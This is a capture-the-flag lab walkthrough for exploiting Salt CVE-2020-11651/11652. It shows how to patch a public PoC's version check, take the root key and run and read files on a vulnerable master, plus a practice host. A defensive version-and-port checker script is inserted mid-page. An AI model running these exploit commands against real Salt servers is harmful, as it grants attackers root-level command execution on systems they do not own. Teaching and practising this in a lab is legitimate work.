W 401: Command Injection on Salt (30 pts extra)

What You Need

Purpose

To practice exploiting Salt, a popular server administration utility.

Create a Target Server

Create a new Debian 9 server on the Google Cloud, with the default settings, including a 10 GB disk.

Installing Salt

In an SSH session on your target server, execute these commands, one at a time, watching to see if any of them return errors:
sudo apt update
sudo apt install git python-dev python-setuptools python-pip -y

sudo python -m pip install pyyaml
sudo python -m pip install tornado
sudo python -m pip install jinja2
sudo python -m pip install msgpack
sudo python -m pip install zmq

git clone git://github.com/saltstack/salt
cd salt
git tag
You see a list of available versions, as shown below.

Execute these commands, one at a time, watching to see if any of them return errors:

git checkout v3000.1
sudo python setup.py install --force
Building and installing Salt takes a few minutes. It should complete without errors.

Launching Salt

On your target server, execute these commands:
sudo salt-master -d
sudo ss -pant
You should see "salt-master" listening on ports 4505 and 4506, as shown below.
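Two things the lab has just made visible also tell a defender whether a master like this one is at risk: the Salt version that was installed (v3000.1 is below the releases that fixed CVE-2020-11651 and CVE-2020-11652, which were 2019.2.4 and 3000.2) and whether the publish (4505) and request (4506) ports are bound to every interface rather than a management address. The script below is an added example, not part of this lab page or of the SaltStack project; it parses constructed `ss -pant` lines written to resemble the target server's listing and compares a version string against the fixed releases.

```python
"""Assess a Salt master's exposure to CVE-2020-11651 / CVE-2020-11652.

Added example for this lab page, not code from the page or from SaltStack.
It checks (1) whether the installed Salt version predates the fixed
releases and (2) whether salt-master's ZeroMQ ports are bound to all
interfaces, which is what makes an unpatched master reachable remotely.
"""

# SaltStack shipped the fix in 2019.2.4 and 3000.2; older builds on either
# branch (such as the lab's v3000.1) are affected.
SALT_PORTS = {4505: "publish (ZeroMQ PUB)", 4506: "request (ZeroMQ ROUTER)"}
ANY_ADDRESS = {"0.0.0.0", "*", "::", "[::]"}

# Constructed sample resembling `sudo ss -pant` on the lab's target server.
SAMPLE_SS = """\
State   Recv-Q  Send-Q  Local Address:Port   Peer Address:Port  Process
LISTEN  0       128     0.0.0.0:22           0.0.0.0:*          users:(("sshd",pid=512,fd=3))
LISTEN  0       1000    0.0.0.0:4505         0.0.0.0:*          users:(("salt-master",pid=1337,fd=12))
LISTEN  0       1000    0.0.0.0:4506         0.0.0.0:*          users:(("salt-master",pid=1337,fd=16))
LISTEN  0       128     127.0.0.1:631        0.0.0.0:*          users:(("cupsd",pid=600,fd=7))
ESTAB   0       0       10.128.0.12:22       10.128.0.5:50122   users:(("sshd",pid=900,fd=4))
"""


def parse_version(version):
    """Turn 'v3000.1' or '2019.2.3' into a tuple of ints for ordered comparison."""
    return tuple(int(part) for part in version.lstrip("v").split("."))


def is_patched(version):
    """True when this Salt version contains the CVE-2020-11651/11652 fix."""
    v = parse_version(version)
    if v[0] >= 3001:          # every release after the 3000 branch carries the fix
        return True
    if v[0] == 3000:          # 3000 branch: fixed from 3000.2 onward
        return v >= (3000, 2)
    return v >= (2019, 2, 4)  # 2019.2 branch and everything older


def exposed_salt_listeners(ss_output):
    """Return (port, local_address, process) for salt-master sockets on any-address."""
    findings = []
    for line in ss_output.splitlines():
        fields = line.split()
        # Skip the header and non-listening sockets.
        if len(fields) < 5 or fields[0] != "LISTEN":
            continue
        addr, _, port = fields[3].rpartition(":")   # handles "[::]:4505" and "*:4505"
        if not port.isdigit() or int(port) not in SALT_PORTS:
            continue
        process = " ".join(fields[5:])
        if "salt-master" in process and addr in ANY_ADDRESS:
            findings.append((int(port), addr, process))
    return findings


def assess(version, ss_output):
    """Combine both checks into a small report dictionary."""
    exposed = exposed_salt_listeners(ss_output)
    patched = is_patched(version)
    return {
        "version": version,
        "patched": patched,
        "exposed_ports": sorted(port for port, _, _ in exposed),
        "risk": "high" if (not patched and exposed) else "low",
    }


if __name__ == "__main__":
    report = assess("v3000.1", SAMPLE_SS)
    for key, value in report.items():
        print(f"{key}: {value}")
    for port in report["exposed_ports"]:
        print(f"  port {port} = {SALT_PORTS[port]} bound to all interfaces")
```

Run it against real `ss -pant` output and the version reported by `salt --version` to get the same report for your own hosts. A "high" result means the master is both unpatched and reachable on 4505/4506 from any network, which is exactly the condition the rest of this lab exploits; the fixes are upgrading to 2019.2.4 or 3000.2 (or later) and restricting those two ports to the minion network with a firewall or by binding the master to a management address.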

Finding the Target IP Address

On your target server, execute this command:
ip a
Find your target server's IP address, as shown below.

Preparing the Attack Server

Create another Debian 9 server on the Google Cloud, with the default settings, including a 10 GB disk.

Installing a PoC Exploit

In an SSH session on your attack server, execute these commands, one at a time, watching to see if any of them return errors:
sudo apt update
sudo apt install git python3-pip -y
pip3 install salt

git clone https://github.com/jasperla/CVE-2020-11651-poc.git
cd CVE-2020-11651-poc/

nano exploit.py
Scroll down to find the "check_salt_version" function, as shown below.

Fixing the Exploit

This exploit is defective. To fix it, change the word False that's outlined in yellow in the image above to True, as shown below.

Type Ctrl+X, Y, Enter to save the file.

Exploiting the Target Server

On your attack server, execute this command, replacing 10.128.0.12 with your target server's IP address.
python3 exploit.py --master 10.128.0.12
The exploit should work, returning a long root key, as shown below.

Flag W 401.1: salt-key (15 pts)

On your attack server, execute these commands, replacing 10.128.0.12 with your target server's IP address.
python3 exploit.py --master 10.128.0.12 --exec "salt-key > /foo"

python3 exploit.py --master 10.128.0.12 -r /foo
You see a list of key types. The flag is covered by a green rectangle in the image below.

Flag W 401.2: saltflag (15 pts)

Exploit this server: salt.samsclass.info

It's running Salt on port 44506.

Read this file to see the flag:

/saltflag/saltflag.txt
Hint: fix the exploit code so you can run it and read its help message.

References

PoC exploit for CVE-2020-11651 and CVE-2020-11652
https://github.com/jasperla/CVE-2020-11651-poc

An Introduction to SaltStack Terminology and Concepts
https://www.digitalocean.com/community/tutorials/an-introduction-to-saltstack-terminology-and-concepts


Posted 5-6-2020